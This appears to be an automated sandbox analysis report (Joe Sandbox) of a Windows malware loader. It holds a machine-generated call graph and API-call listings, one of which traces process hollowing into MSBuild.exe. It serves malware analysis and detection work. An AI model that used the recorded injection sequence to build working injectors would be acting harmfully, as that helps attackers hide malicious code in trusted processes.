14005->14006 14007 337e38 14005->14007 14006->13975 14006->13976 14007->14006 14008 33e783 __Getctype 39 API calls 14007->14008 14009 337e59 14008->14009 14013 33ed66 14009->14013 14014 33ed79 14013->14014 14016 337e6f 14013->14016 14014->14016 14021 342046 14014->14021 14017 33ed93 14016->14017 14018 33eda6 14017->14018 14020 33edbb 14017->14020 14018->14020 14042 340039 14018->14042 14020->14006 14022 342052 ___scrt_is_nonwritable_in_current_image 14021->14022 14023 33e783 __Getctype 39 API calls 14022->14023 14024 34205b 14023->14024 14031 3420a1 14024->14031 14034 33b750 EnterCriticalSection 14024->14034 14026 342079 14035 3420c7 14026->14035 14031->14016 14032 33b9c2 CallUnexpected 39 API calls 14033 3420c6 14032->14033 14034->14026 14036 3420d5 __Getctype 14035->14036 14038 34208a 14035->14038 14037 341e7b __Getctype 14 API calls 14036->14037 14036->14038 14037->14038 14039 3420a6 14038->14039 14040 33b767 std::_Lockit::~_Lockit LeaveCriticalSection 14039->14040 14041 34209d 14040->14041 14041->14031 14041->14032 14043 33e783 __Getctype 39 API calls 14042->14043 14044 34003e 14043->14044 14044->14020 14046 34064b GetCPInfo 14045->14046 14055 340714 14045->14055 14051 340663 14046->14051 14046->14055 14048 3329c6 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 14050 3407c6 14048->14050 14050->13989 14056 33faf3 14051->14056 14055->14048 14057 337e1a __strnicoll 39 API calls 14056->14057 14058 33fb13 14057->14058 14076 33e57f 14058->14076 14060 33fbcf 14063 3329c6 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 14060->14063 14061 33fbc7 14079 3354a7 14061->14079 14062 33fb40 14062->14060 14062->14061 14065 33e531 __fread_nolock 15 API calls 14062->14065 14067 33fb65 __fread_nolock __alloca_probe_16 14062->14067 14066 33fbf2 14063->14066 14065->14067 14071 33fbf4 14066->14071 14067->14061 14068 33e57f __strnicoll MultiByteToWideChar 14067->14068 14069 33fbae 14068->14069 14069->14061 14070 33fbb5 GetStringTypeW 14069->14070 14070->14061 14083 33e5a9 14076->14083 14080 3354c2 14079->14080 14081 3354b1 14079->14081 14080->14060 14081->14080 14085 33c522 14081->14085 14084 33e59b MultiByteToWideChar 14083->14084 14084->14062 14086 33e4f7 ___free_lconv_mon 14 API calls 14085->14086 14125->14000 14136 33c20e 14126->14136 14128 340584 14129 33c20e __fread_nolock 29 API calls 14128->14129 14130 3405a3 14129->14130 14137 33c21f 14136->14137 14145 33c21b _Yarn 14136->14145 14138 33c226 14137->14138 14141 33c239 __fread_nolock 14137->14141 14139 33ad6d __dosmaperr 14 API calls 14138->14139 14140 33c22b 14139->14140 14143 33c270 14141->14143 14144 33c267 14141->14144 14141->14145 14143->14145 14148 33ad6d __dosmaperr 14 API calls 14143->14148 14146 33ad6d __dosmaperr 14 API calls 14144->14146 14145->14128 14147 33c26c 14146->14147 14148->14147 14152 33e188 14151->14152 14153 33e17a 14151->14153 14154 33ad6d __dosmaperr 14 API calls 14152->14154 14153->14152 14158 33e1a0 14153->14158 14155 33e190 14154->14155 14156 33b458 __strnicoll 29 API calls 14155->14156 14157 33e19a 14156->14157 14157->13916 14158->14157 14159 33ad6d __dosmaperr 14 API calls 14158->14159 14159->14155 14161 33b24c 14160->14161 14165 33b269 14160->14165 14162 33b263 14161->14162 14163 33e4f7 ___free_lconv_mon 14 API calls 14161->14163 14164 33e4f7 ___free_lconv_mon 14 API calls 14162->14164 14163->14161 14164->14165 14165->13917 14167 344931 14166->14167 14168 344942 14167->14168 14171 344955 ___from_strstr_to_strchr 14167->14171 14169 33ad6d __dosmaperr 14 API calls 14168->14169 14178 344947 14169->14178 14170 344b6c 14172 33ad6d __dosmaperr 14 API calls 14170->14172 14171->14170 14173 344975 14171->14173 14174 344b71 14172->14174 14229 344b91 14173->14229 14176 33e4f7 ___free_lconv_mon 14 API calls 14174->14176 14176->14178 14178->13871 14179 3449b9 14181 3449a5 14179->14181 14233 344bab 14179->14233 14180 3449bb 14180->14181 14185 33f807 __dosmaperr 14 API calls 14180->14185 14186 33e4f7 ___free_lconv_mon 14 API calls 14181->14186 14182 344997 14189 3449b4 14182->14189 14190 3449a0 14182->14190 14187 3449c9 14185->14187 14186->14178 14188 33e4f7 ___free_lconv_mon 14 API calls 14187->14188 14192 3449d4 14188->14192 14194 344b91 39 API calls 14189->14194 14193 33ad6d __dosmaperr 14 API calls 14190->14193 14191 344a2e 14195 33e4f7 ___free_lconv_mon 14 API calls 14191->14195 14192->14179 14192->14181 14198 33f807 __dosmaperr 14 API calls 14192->14198 14193->14181 14194->14179 14201 344a36 14195->14201 14196 344a79 14196->14181 14197 343f46 std::ios_base::_Init 32 API calls 14196->14197 14199 344aa7 14197->14199 14202 3449f0 14198->14202 14200 33e4f7 ___free_lconv_mon 14 API calls 14199->14200 14206 344a63 14200->14206 14201->14206 14237 343f46 14201->14237 14205 33e4f7 ___free_lconv_mon 14 API calls 14202->14205 14203 33e4f7 ___free_lconv_mon 14 API calls 14203->14178 14205->14179 14206->14181 14206->14206 14209 33f807 __dosmaperr 14 API calls 14206->14209 14227 344b61 14206->14227 14207 344a5a 14208 33e4f7 ___free_lconv_mon 14 API calls 14207->14208 14208->14206 14210 344af2 14209->14210 14211 344b02 14210->14211 14212 344afa 14210->14212 14214 33e16c ___std_exception_copy 29 API calls 14211->14214 14213 33e4f7 ___free_lconv_mon 14 API calls 14212->14213 14213->14181 14215 344b0e 14214->14215 14216 344b15 14215->14216 14217 344b86 14215->14217 14246 349a5c 14216->14246 14219 33b485 __Getctype 11 API calls 14217->14219 14221 344b90 14219->14221 14222 344b3c 14223 344b5b 14227->14203 14230 344b9e 14229->14230 14231 344980 14229->14231 14261 344c00 14230->14261 14231->14179 14231->14180 14231->14182 14234 344a1e 14233->14234 14236 344bc1 14233->14236 14234->14191 14234->14196 14236->14234 14276 34996b 14236->14276 14238 343f53 14237->14238 14239 343f6e 14237->14239 14238->14239 14240 343f5f 14238->14240 14241 343f7d 14239->14241 14376 349604 14239->14376 14242 33ad6d __dosmaperr 14 API calls 14240->14242 14383 34757c 14241->14383 14245 343f64 __fread_nolock 14242->14245 14245->14207 14395 33f7c8 14246->14395 14251 349acf 14253 33e4f7 ___free_lconv_mon 14 API calls 14251->14253 14254 349adb 14251->14254 14252 33f7c8 39 API calls 14256 349aac 14252->14256 14253->14254 14255 344b36 14254->14255 14257 33e4f7 ___free_lconv_mon 14 API calls 14254->14257 14255->14222 14255->14223 14258 337f14 17 API calls 14256->14258 14257->14255 14259 349ab9 14258->14259 14259->14251 14262 344c13 14261->14262 14263 344c0e 14261->14263 14264 33f807 __dosmaperr 14 API calls 14262->14264 14263->14231 14273 344c30 14264->14273 14265 344c9e 14267 33b9c2 CallUnexpected 39 API calls 14265->14267 14266 344c8d 14268 33e4f7 ___free_lconv_mon 14 API calls 14266->14268 14269 344ca3 14267->14269 14268->14263 14270 33b485 __Getctype 11 API calls 14269->14270 14271 344caf 14270->14271 14272 33f807 __dosmaperr 14 API calls 14272->14273 14273->14265 14273->14266 14273->14269 14273->14272 14274 33e4f7 ___free_lconv_mon 14 API calls 14273->14274 14275 33e16c ___std_exception_copy 29 API calls 14273->14275 14274->14273 14275->14273 14277 34997f 14276->14277 14278 349979 14276->14278 14294 349994 14277->14294 14281 34a0b3 14278->14281 14282 34a0fb 14278->14282 14284 34a0b9 14281->14284 14286 34a0d6 14281->14286 14314 34a111 14282->14314 14285 33ad6d __dosmaperr 14 API calls 14284->14285 14288 34a0be 14285->14288 14290 33ad6d __dosmaperr 14 API calls 14286->14290 14293 34a0f4 14286->14293 14287 34a0c9 14287->14236 14289 33b458 __strnicoll 29 API calls 14288->14289 14289->14287 14291 34a0e5 14290->14291 14292 33b458 __strnicoll 29 API calls 14291->14292 14292->14287 14293->14236 14295 337e1a __strnicoll 39 API calls 14294->14295 14296 3499aa 14295->14296 14297 3499c6 14296->14297 14298 3499dd 14296->14298 14312 34998f 14296->14312 14299 33ad6d __dosmaperr 14 API calls 14297->14299 14301 3499e6 14298->14301 14302 3499f8 14298->14302 14300 3499cb 14299->14300 14303 33b458 __strnicoll 29 API calls 14300->14303 14304 33ad6d __dosmaperr 14 API calls 14301->14304 14305 349a05 14302->14305 14306 349a18 14302->14306 14303->14312 14308 3499eb 14304->14308 14309 34a111 __strnicoll 39 API calls 14305->14309 14332 34a1dc 14306->14332 14311 33b458 __strnicoll 29 API calls 14308->14311 14309->14312 14311->14312 14312->14236 14313 33ad6d __dosmaperr 14 API calls 14313->14312 14315 34a121 14314->14315 14316 34a13b 14314->14316 14317 33ad6d __dosmaperr 14 API calls 14315->14317 14318 34a143 14316->14318 14319 34a15a 14316->14319 14322 34a126 14317->14322 14323 33ad6d __dosmaperr 14 API calls 14318->14323 14320 34a166 14319->14320 14321 34a17d 14319->14321 14324 33ad6d __dosmaperr 14 API calls 14320->14324 14329 337e1a __strnicoll 39 API calls 14321->14329 14331 34a131 14321->14331 14325 33b458 __strnicoll 29 API calls 14322->14325 14326 34a148 14323->14326 14328 34a16b 14324->14328 14325->14331 14327 33b458 __strnicoll 29 API calls 14326->14327 14327->14331 14330 33b458 __strnicoll 29 API calls 14328->14330 14329->14331 14330->14331 14331->14287 14333 337e1a __strnicoll 39 API calls 14332->14333 14334 34a1ef 14333->14334 14337 34a222 14334->14337 14343 34a256 __strnicoll 14337->14343 14338 3329c6 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 14339 349a2e 14338->14339 14339->14312 14339->14313 14340 34a2d6 14342 33e57f __strnicoll MultiByteToWideChar 14340->14342 14349 34a2da 14340->14349 14341 34a4ba 14346 34a35c 14342->14346 14343->14340 14343->14341 14344 34a2c3 GetCPInfo 14343->14344 14343->14349 14344->14340 14344->14349 14345 34a4ae 14347 3354a7 __freea 14 API calls 14345->14347 14346->14345 14348 33e531 __fread_nolock 15 API calls 14346->14348 14346->14349 14350 34a383 __alloca_probe_16 14346->14350 14347->14349 14348->14350 14349->14338 14349->14341 14350->14345 14351 33e57f __strnicoll MultiByteToWideChar 14350->14351 14352 34a3cf 14351->14352 14352->14345 14353 33e57f __strnicoll MultiByteToWideChar 14352->14353 14354 34a3eb 14353->14354 14354->14345 14355 34a3f9 14354->14355 14356 34a45c 14355->14356 14358 33e531 __fread_nolock 15 API calls 14355->14358 14361 34a412 __alloca_probe_16 14355->14361 14357 3354a7 __freea 14 API calls 14356->14357 14358->14361 14361->14356 14362 33e57f __strnicoll MultiByteToWideChar 14361->14362 14377 349624 HeapSize 14376->14377 14378 34960f 14376->14378 14377->14241 14379 33ad6d __dosmaperr 14 API calls 14378->14379 14380 349614 14379->14380 14381 33b458 __strnicoll 29 API calls 14380->14381 14382 34961f 14381->14382 14382->14241 14384 347594 14383->14384 14385 347589 14383->14385 14387 34759c 14384->14387 14394 3475a5 __dosmaperr 14384->14394 14386 33e531 __fread_nolock 15 API calls 14385->14386 14392 347591 14386->14392 14388 33e4f7 ___free_lconv_mon 14 API calls 14387->14388 14388->14392 14389 3475cf HeapReAlloc 14389->14392 14389->14394 14390 3475aa 14391 33ad6d __dosmaperr 14 API calls 14390->14391 14391->14392 14392->14245 14393 338f08 codecvt 2 API calls 14393->14394 14394->14389 14394->14390 14394->14393 14396 337e1a __strnicoll 39 API calls 14395->14396 14397 33f7da 14396->14397 14399 33f7ec 14397->14399 14403 33f04d 14397->14403 14400 337f14 14399->14400 14409 337f6c 14400->14409 14406 33f5b9 14403->14406 14407 33f534 std::_Lockit::_Lockit 5 API calls 14406->14407 14408 33f055 14407->14408 14408->14399 14410 337f94 14409->14410 14411 337f7a 14409->14411 14413 337f9b 14410->14413 14414 337fba 14410->14414 14427 337efa 14411->14427 14426 337f2c 14413->14426 14431 337ebb 14413->14431 14415 33e57f __strnicoll MultiByteToWideChar 14414->14415 14419 337fc9 14415->14419 14417 337fd0 GetLastError 14436 33ad93 14417->14436 14419->14417 14422 337ebb 15 API calls 14419->14422 14425 337ff6 14419->14425 14420 33e57f __strnicoll MultiByteToWideChar 14423 33800d 14420->14423 14422->14425 14423->14417 14423->14426 14425->14420 14425->14426 14426->14251 14426->14252 14428 337f0d 14427->14428 14429 337f05 14427->14429 14428->14426 14430 33e4f7 ___free_lconv_mon 14 API calls 14429->14430 14430->14428 14432 337efa 14 API calls 14431->14432 14433 337ec9 14432->14433 14441 337e9c 14433->14441 14444 33ad80 14436->14444 14442 33e531 __fread_nolock 15 API calls 14441->14442 14443 337ea9 14442->14443 14443->14426 14448 3329c6 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 14447->14448 14449 3358ca 14448->14449 14449->13368 14451 338d4e 14450->14451 14460 338d5f 14450->14460 14452 334fcd __CreateFrameInfo GetModuleHandleW 14451->14452 14456 338d53 14452->14456 14455 338c0d 14455->13339 14456->14460 14461 338c55 GetModuleHandleExW 14456->14461 14466 338ebb 14460->14466 14462 338c94 GetProcAddress 14461->14462 14463 338ca8 14461->14463 14462->14463 14464 338cc4 14463->14464 14465 338cbb FreeLibrary 14463->14465 14464->14460 14465->14464 14467 338ec7 ___scrt_is_nonwritable_in_current_image 14466->14467 14481 33b750 EnterCriticalSection 14467->14481 14469 338ed1 14482 338db8 14469->14482 14471 338ede 14486 338efc 14471->14486 14474 338cf0 14511 338cd7 14474->14511 14476 338cfa 14477 338d0e 14476->14477 14478 338cfe GetCurrentProcess TerminateProcess 14476->14478 14479 338c55 __CreateFrameInfo 3 API calls 14477->14479 14478->14477 14480 338d16 ExitProcess 14479->14480 14481->14469 14484 338dc4 ___scrt_is_nonwritable_in_current_image __CreateFrameInfo 14482->14484 14483 338e28 __CreateFrameInfo 14483->14471 14484->14483 14489 33aa87 14484->14489 14510 33b767 LeaveCriticalSection 14486->14510 14488 338d97 14488->14455 14488->14474 14490 33aa93 __EH_prolog3 14489->14490 14493 33ad12 14490->14493 14492 33aaba codecvt 14492->14483 14494 33ad1e ___scrt_is_nonwritable_in_current_image 14493->14494 14501 33b750 EnterCriticalSection 14494->14501 14496 33ad2c 14502 33abdd 14496->14502 14501->14496 14503 33abfc 14502->14503 14504 33abf4 14502->14504 14503->14504 14505 33e4f7 ___free_lconv_mon 14 API calls 14503->14505 14506 33ad61 14504->14506 14505->14504 14509 33b767 LeaveCriticalSection 14506->14509 14508 33ad4a 14508->14492 14509->14508 14510->14488 14514 340f55 14511->14514 14513 338cdc __CreateFrameInfo 14513->14476 14515 340f64 __CreateFrameInfo 14514->14515 14516 340f71 14515->14516 14518 33f3e7 14515->14518 14516->14513 14519 33f534 std::_Lockit::_Lockit 5 API calls 14518->14519 14520 33f403 14519->14520 14520->14516 14522 338697 14521->14522 14524 3386a9 ___scrt_uninitialize_crt 14521->14524 14523 3386a5 14522->14523 14526 33bbb9 14522->14526 14523->13377 14524->13377 14529 33bce4 14526->14529 14532 33bdbd 14529->14532 14533 33bdc9 ___scrt_is_nonwritable_in_current_image 14532->14533 14540 33b750 EnterCriticalSection 14533->14540 14535 33be3f 14549 33be5d 14535->14549 14539 33bdd3 ___scrt_uninitialize_crt 14539->14535 14541 33bd31 14539->14541 14540->14539 14542 33bd3d ___scrt_is_nonwritable_in_current_image 14541->14542 14552 33875f EnterCriticalSection 14542->14552 14544 33bd80 14564 33bdb1 14544->14564 14545 33bd47 ___scrt_uninitialize_crt 14545->14544 14553 33bbc2 14545->14553 14665 33b767 LeaveCriticalSection 14549->14665 14551 33bbc0 14551->14523 14552->14545 14554 33bbd7 _Fputc 14553->14554 14555 33bbe9 14554->14555 14556 33bbde 14554->14556 14567 33bc27 14555->14567 14558 33bce4 ___scrt_uninitialize_crt 68 API calls 14556->14558 14561 33bbe4 _Fputc 14558->14561 14561->14544 14562 33bc0a 14580 345164 14562->14580 14664 338773 LeaveCriticalSection 14564->14664 14566 33bd9f 14566->14539 14568 33bc40 14567->14568 14569 33bbf3 14567->14569 14568->14569 14570 340efc _Fputc 29 API calls 14568->14570 14569->14561 14573 340efc 14569->14573 14571 33bc5c 14570->14571 14591 34549f 14571->14591 14574 340f1d 14573->14574 14575 340f08 14573->14575 14574->14562 14576 33ad6d __dosmaperr 14 API calls 14575->14576 14577 340f0d 14576->14577 14578 33b458 __strnicoll 29 API calls 14577->14578 14579 340f18 14578->14579 14579->14562 14581 345175 14580->14581 14582 345182 14580->14582 14583 33ad6d __dosmaperr 14 API calls 14581->14583 14584 3451cb 14582->14584 14587 3451a9 14582->14587 14586 34517a 14583->14586 14585 33ad6d __dosmaperr 14 API calls 14584->14585 14588 3451d0 14585->14588 14586->14561 14634 3451e1 14587->14634 14589 33b458 __strnicoll 29 API calls 14588->14589 14589->14586 14593 3454ab ___scrt_is_nonwritable_in_current_image 14591->14593 14592 3454b3 14592->14569 14593->14592 14594 3454ec 14593->14594 14596 345532 14593->14596 14595 33b601 __strnicoll 29 API calls 14594->14595 14595->14592 14602 344ef9 EnterCriticalSection 14596->14602 14598 345538 14599 345556 14598->14599 14603 345283 14598->14603 14631 3455a8 14599->14631 14602->14598 14604 3452ab 14603->14604 14630 3452ce __fread_nolock 14603->14630 14605 3452af 14604->14605 14607 34530a 14604->14607 14606 33b601 __strnicoll 29 API calls 14605->14606 14606->14630 14608 345328 14607->14608 14609 344033 _Fputc 31 API calls 14607->14609 14610 3455b0 _Fputc 40 API calls 14608->14610 14609->14608 14630->14599 14632 344f1c __fread_nolock LeaveCriticalSection 14631->14632 14633 3455ae 14632->14633 14633->14592 14635 3451ed ___scrt_is_nonwritable_in_current_image 14634->14635 14647 344ef9 EnterCriticalSection 14635->14647 14637 3451fc 14645 345241 14637->14645 14648 344cb0 14637->14648 14639 33ad6d __dosmaperr 14 API calls 14645->14639 14647->14637 14649 344cd2 14648->14649 14650 344cbd 14648->14650 14664->14566 14665->14551

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00355110,00355100), ref: 00355334
                                                                                                                                                                                                                                                                • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00355347
                                                                                                                                                                                                                                                                • Wow64GetThreadContext.KERNEL32(0000008C,00000000), ref: 00355365
                                                                                                                                                                                                                                                                • ReadProcessMemory.KERNELBASE(00000088,?,00355154,00000004,00000000), ref: 00355389
                                                                                                                                                                                                                                                                • VirtualAllocEx.KERNELBASE(00000088,?,?,00003000,00000040), ref: 003553B4
                                                                                                                                                                                                                                                                • TerminateProcess.KERNELBASE(00000088,00000000), ref: 003553D3
                                                                                                                                                                                                                                                                • WriteProcessMemory.KERNELBASE(00000088,00000000,?,?,00000000,?), ref: 0035540C
                                                                                                                                                                                                                                                                • WriteProcessMemory.KERNELBASE(00000088,00400000,?,?,00000000,?,00000028), ref: 00355457
                                                                                                                                                                                                                                                                • WriteProcessMemory.KERNELBASE(00000088,?,?,00000004,00000000), ref: 00355495
                                                                                                                                                                                                                                                                • Wow64SetThreadContext.KERNEL32(0000008C,010D0000), ref: 003554D1
                                                                                                                                                                                                                                                                • ResumeThread.KERNELBASE(0000008C), ref: 003554E0
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResumeTerminate
                                                                                                                                                                                                                                                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
                                                                                                                                                                                                                                                                • API String ID: 2440066154-3857624555
                                                                                                                                                                                                                                                                • Opcode ID: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                                                                                                                                                                                                • Instruction ID: d1c3b14001910b283519785fbc610c2601f8463cbf7f9699453434708cb655ff
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FEB1087660064AAFDB60CF68CC80BDA73A5FF88714F168524EA0CAB751D770FA41CB94

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00331098: _strlen.LIBCMT ref: 003310F9
                                                                                                                                                                                                                                                                • CreateFileA.KERNELBASE ref: 00331675
                                                                                                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 00331685
                                                                                                                                                                                                                                                                • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 003316AB
                                                                                                                                                                                                                                                                • CloseHandle.KERNELBASE(00000000), ref: 003316BA
                                                                                                                                                                                                                                                                • _strlen.LIBCMT ref: 00331705
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00331805
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: File$CloseHandle_strlen$CreateReadSize
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2911764282-0
                                                                                                                                                                                                                                                                • Opcode ID: d72d8173033cb09c37da75eb78a95cf91b32a95add117bb8070b4d6bdd94767b
                                                                                                                                                                                                                                                                • Instruction ID: 6391c2f71201945b2327666c6f9712f871c14ec481b36ec80670bfc85c3ec831
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d72d8173033cb09c37da75eb78a95cf91b32a95add117bb8070b4d6bdd94767b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FF51F1B19043009BD702AF24DCC5B2FB7E9FF88344F154A2DF4899B251E734D9448752

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00331098: _strlen.LIBCMT ref: 003310F9
                                                                                                                                                                                                                                                                • FreeConsole.KERNELBASE ref: 0033158B
                                                                                                                                                                                                                                                                  • Part of subcall function 0033123B: KiUserExceptionDispatcher.NTDLL(00000000,00000000,00000000), ref: 003312C7
                                                                                                                                                                                                                                                                • VirtualProtect.KERNELBASE(00355011,00000549,00000040,?), ref: 003315D7
                                                                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 0033160E
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ConsoleDispatcherExceptionExitFreeProcessProtectUserVirtual_strlen
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2898289550-0
                                                                                                                                                                                                                                                                • Opcode ID: 66eef3d80ee16b8100a8b64297df1ad91ce8b7b7885fe8eaab99010f633f0889
                                                                                                                                                                                                                                                                • Instruction ID: c2fcb80b596608f38c91c225fe55885f94ff5378d16bf8cedc0b9934fbbaf48e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 66eef3d80ee16b8100a8b64297df1ad91ce8b7b7885fe8eaab99010f633f0889
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C511CA71E002086BEB06AB65DC92FFF7768EF85701F404425F908AB2E1E675AD1547E1

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 93 33123b-331261 94 331263-33127c 93->94 94->94 95 33127e-331280 94->95 96 331282-3312ac 95->96 96->96 97 3312ae-3312b6 96->97 98 331355-33136d call 3329c6 97->98 99 3312bc-3312c0 97->99 100 3312c2-3312df KiUserExceptionDispatcher 99->100 103 3312e1-3312eb call 33136e 100->103 104 3312fc-33134f 100->104 106 3312f0-3312f9 call 331533 103->106 104->98 104->100 106->104
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • KiUserExceptionDispatcher.NTDLL(00000000,00000000,00000000), ref: 003312C7
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: DispatcherExceptionUser
                                                                                                                                                                                                                                                                • String ID: [+]
                                                                                                                                                                                                                                                                • API String ID: 6842923-4228040803
                                                                                                                                                                                                                                                                • Opcode ID: 8969c6317cd71645401bd306019cd2c92d263eec6b1c3b1635951d44a48f8a15
